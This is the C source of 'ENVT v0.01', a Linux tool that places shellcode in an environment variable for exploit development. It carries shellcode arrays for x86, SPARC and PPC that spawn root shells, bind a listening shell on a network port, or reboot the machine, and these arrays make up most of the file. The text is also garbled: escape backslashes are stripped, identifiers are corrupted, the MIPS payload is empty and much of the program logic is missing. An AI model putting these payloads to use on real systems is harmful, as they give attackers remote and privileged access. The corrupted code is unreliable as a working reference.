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ENVT v0.01, Simple Environment shellcode injector for linux

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Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs ,

this tool injects shellcodes into linux environment and uses these shellcodes

for exploit developing , maybe IDS detections or testing and other stuff ....

[ SIGINT , SIGHUP , SIGABRT handlers added ]


* Qnix <Qnix@bsdmail.org>

* ENVT v0.01


* */

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#define VERSION "v0.1"

#define MAX_SIZE 1024

#define SHSIZE 512

#define bash "/bin/bash"

/* Prototype */

void getenvaddr(char *environment);

void help(char *string);

void setshenv(int shellcode);

/****************** START OF SHELLCODES ******************/

char execve_binbash[] =

"x31xc0" // xor %eax, %eax

"x50" // push %eax

"x68x2fx2fx73x68" // push $0x68732f2f

"x68x2fx62x69x6e" // push $0x6e69622f

"x89xe3" // mov %esp, %ebx

"x50" // push %eax

"x53" // push %ebx

"x89xe1" // mov %esp, %ecx

"x31xd2" // xor %edx, %edx

"xb0x0b" // mov $0xb, %al

"xcdx80"; // int $0x80

char execve_setuid_setgid_bb[] =

"x6ax17" // push $0x17

"x58" // pop %eax

"x31xdb" // xor %ebx, %ebx

"xcdx80" // int $0x80

"x6ax2e" // push $0x2e

"x58" // pop %eax

"x53" // push %ebx

"xcdx80" // int $0x80

"x31xd2" // xor %edx, %edx

"x6ax0b" // push $0xb

"x58" // pop %eax

"x52" // push %edx

"x68x2fx2fx73x68" // push $0x68732f2f

"x68x2fx62x69x6e" // push $0x6e69622f

"x89xe3" // mov %esp, %ebx

"x52" // push %edx

"x53" // push %ebx

"x89xe1" // mov %esp, %ecx

"xcdx80"; // int $0x80

char portbind_64713[] =

/* socket(AF_INET, SOCK_STREAM, 0) */

"x6ax66" // push $0x66

"x58" // pop %eax

"x6ax01" // push $0x1

"x5b" // pop %ebx

"x99" // cltd

"x52" // push %edx

"x53" // push %ebx

"x6ax02" // push $0x2

"x89xe1" // mov %esp,%ecx

"xcdx80" // int $0x80

/* bind(s, server, sizeof(server)) */

"x52" // push %edx

"x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713

"x66x6ax02" // pushw $0x2

"x89xe1" // mov $esp,%ecx

"x6ax10" // push $0x10

"x51" // push %ecx

"x50" // push %eax

"x89xe1" // mov %esp,%ecx

"x89xc6" // mov %eax,%esi

"x43" // inc %ebx

"xb0x66" // mov $0x66,%al

"xcdx80" // int $0x80

/* listen(s, anything) */

"xb0x66" // mov $0x66,%al

"xd1xe3" // shl %ebx

"xcdx80" // int $0x80

/* accept(s, 0, 0) */

"x52" // push %edx

"x56" // push %esi

"x89xe1" // mov %esp,%ecx

"x43" // inc %ebx

"xb0x66" // mov $0x66,%al

"xcdx80" // int $0x80

"x93" // xchg %eax,%ebx

/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */

"x6ax02" // push $0x2

"x59" // pop %ecx

"xb0x3f" // mov $0x3f,%al

"xcdx80" // int $0x80

"x49" // dec %ecx

"x79xf9" // jns dup_loop

/* execve("/bin/sh", ["/bin/sh"], NULL) */

"x6ax0b" // push $0xb

"x58" // pop %eax

"x52" // push %edx

"x68x2fx2fx73x68" // push $0x68732f2f

"x68x2fx62x69x6e" // push $0x6e69622f

"x89xe3" // mov %esp, %ebx

"x52" // push %edx

"x53" // push %ebx

"x89xe1" // mov %esp, %ecx

"xcdx80"; // int $0x80

char reboot_20[] =

"x6ax58" // push $0x58

"x58" // pop %eax

"xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx

"xb9x69x19x12x28" // mov $0x28121969,%ecx

"xbax67x45x23x01" // mov $0x1234567,%edx

"xcdx80"; // int $0x80

char sparc_portbind[]=

"x9dxe3xbfx78" // save %sp, -136, %sp

"x90x10x20x02" // mov 2, %o0

"x92x10x20x01" // mov 1, %o1

"x94x22x80x0a" // sub %o2, %o2, %o2

"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]

"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]

"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]

"x90x10x20x01" // mov 1, %o0

"x92x03xa0x44" // add %sp, 0x44, %o1

"x82x10x20xce" // mov 0xce, %g1

"x91xd0x20x10" // ta 0x10

"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]

"x90x10x20x02" // mov 2, %o0

"xd0x37xbfxd8" // sth %o0, [ %fp + -40 ]

"x13x08xc8xc8" // sethi %hi(0x23232000), %o1

"x90x12x63x0f" // or %o1, 0x30f, %o0

"xd0x37xbfxda" // sth %o0, [ %fp + -38 ]

"xc0x27xbfxdc" // clr [ %fp + -36 ]

"x92x07xbfxd8" // add %fp, -40, %o1

"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0

"x94x10x20x10" // mov 0x10, %o2

"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]

"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]

"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]

"x90x10x20x02" // mov 2, %o0

"x92x03xa0x44" // add %sp, 0x44, %o1

"x82x10x20xce" // mov 0xce, %g1

"x91xd0x20x10" // ta 0x10

"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0

"x92x10x20x05" // mov 5, %o1

"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]

"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]

"x90x10x20x04" // mov 4, %o0

"x92x03xa0x44" // add %sp, 0x44, %o1

"x82x10x20xce" // mov 0xce, %g1

"x91xd0x20x10" // ta 0x10

"x92x07xbfxd8" // add %fp, -40, %o1

"x94x07xbfxec" // add %fp, -20, %o2

"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0

"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]

"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]

"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]

"x90x10x20x05" // mov 5, %o0

"x92x03xa0x44" // add %sp, 0x44, %o1

"x82x10x20xce" // mov 0xce, %g1

"x91xd0x20x10" // ta 0x10

"xd0x27xbfxf0" // st %o0, [ %fp + -16 ]

"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0

"x92x22x40x09" // sub %o1, %o1, %o1

"x82x10x20x5a" // mov 0x5a, %g1

"x91xd0x20x10" // ta 0x10

"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0

"x92x10x20x01" // mov 1, %o1

"x82x10x20x5a" // mov 0x5a, %g1

"x91xd0x20x10" // ta 0x10

"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0

"x92x10x20x02" // mov 2, %o1

"x82x10x20x5a" // mov 0x5a, %g1

"x91xd0x20x10" // ta 0x10

"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6

"xacx15xa1x6e" // or %l6, 0x16e, %l6

"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7

"x90x0bx80x0e" // and %sp, %sp, %o0

"x92x03xa0x08" // add %sp, 8, %o1

"x94x22x80x0a" // sub %o2, %o2, %o2

"x9cx03xa0x10" // add %sp, 0x10, %sp

"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]

"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]

"xc0x23xbfxfc" // clr [ %sp + -4 ]

"x82x10x20x3b" // mov 0x3b, %g1

"x91xd0x20x10"; // ta 0x10

char mips_sh[] =

/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */








char ppc_sh[] =

"x7cx3fx0bx78" /*mr r31,r1*/

"x7cxa5x2ax79" /*xor. r5,r5,r5*/

"x42x40xffxf9" /*bdzl+ 10000454<main>*/

"x7fx08x02xa6" /*mflr r24*/

"x3bx18x01x34" /*addi r24,r24,308*/

"x98xb8xfexfb" /*stb r5,-261(r24)*/

"x38x78xfexf4" /*addi r3,r24,-268*/

"x90x61xffxf8" /*stw r3,-8(r1)*/

"x38x81xffxf8" /*addi r4,r1,-8*/

"x90xa1xffxfc" /*stw r5,-4(r1)*/

"x3bxc0x01x60" /*li r30,352*/

"x7fxc0x2ex70" /*srawi r0,r30,5*/

"x44xdexadxf2" /*.long 0x44deadf2*/

"/bin/shZ"; // the last byte becomes NULL

/****************** END OF SHELLCODES ******************/

int main(int argc, char *argv[]) {

int c;

char buf1[MAX_SIZE];

char *addr = getenv("ENVT");

int buf1i;

extern char *optarg;

extern int optind, optopt;

if(addr != NULL) {




if(argc < 2) {



while((c = getopt(argc, argv, ":s:lhv")) != -1) {

switch© {

case 'v':



case 'h':


case 'l':



case 's':


buf1i = atoi(buf1);



case ':':

fprintf(stderr,"Option -%c requires an operandn",optopt);







* Display version .


* */

int version() {

fprintf(stdout,"ENVT %sn",VERSION);

fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n");




* Display help .


* */

void getenvaddr(char *environment) {

fprintf(stdout,"SHELLCODE FOUND IN %pn",environment);


void help(char *string) {

fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string);




* Display shellcode list .


* */

int shellcode_list() {

fprintf(stdout,"nttt::[ LINUX/x86 ]::n");

fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");

fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn");

fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn");

fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn");

fprintf(stdout,"ttt::[ LINUX/SPARC ]::n");

fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn");

fprintf(stdout,"ttt::[ LINUX/MIPS ]::n");

fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn");

fprintf(stdout,"ttt::[ LINUX/PPC ]::n");

fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn");




* Set Shellcode in environment .


* */

void setshenv(int shellcode) {

char *addr = getenv("ENVT"); // Use to get shellcode addr

char execvebb[sHSIZE]; // Use for shellcode(1)

char setugbb[sHSIZE]; // Use for shellcode(2)

char portbind[sHSIZE]; // Use for shellcode(3)

char reboot[sHSIZE]; // Use for shellcode(4)

char sparc1[sHSIZE]; // Use for shellcode(5)

char mips1[sHSIZE]; // Use for shellcode(6)

char ppc1[sHSIZE]; // Use for shellcode(7)

if(shellcode >= 8) {

fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);



/* Shellcode number 1 */

if(shellcode == 1) {

fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");

fprintf(stdout,"[+]t Setting memory for the shellcode .n");


fprintf(stdout,"[+]t Copying shellcode to memory .n");

memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));


fprintf(stdout,"[+]t Putting shellcode in the environment .n");


fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));

execl(bash, bash, '

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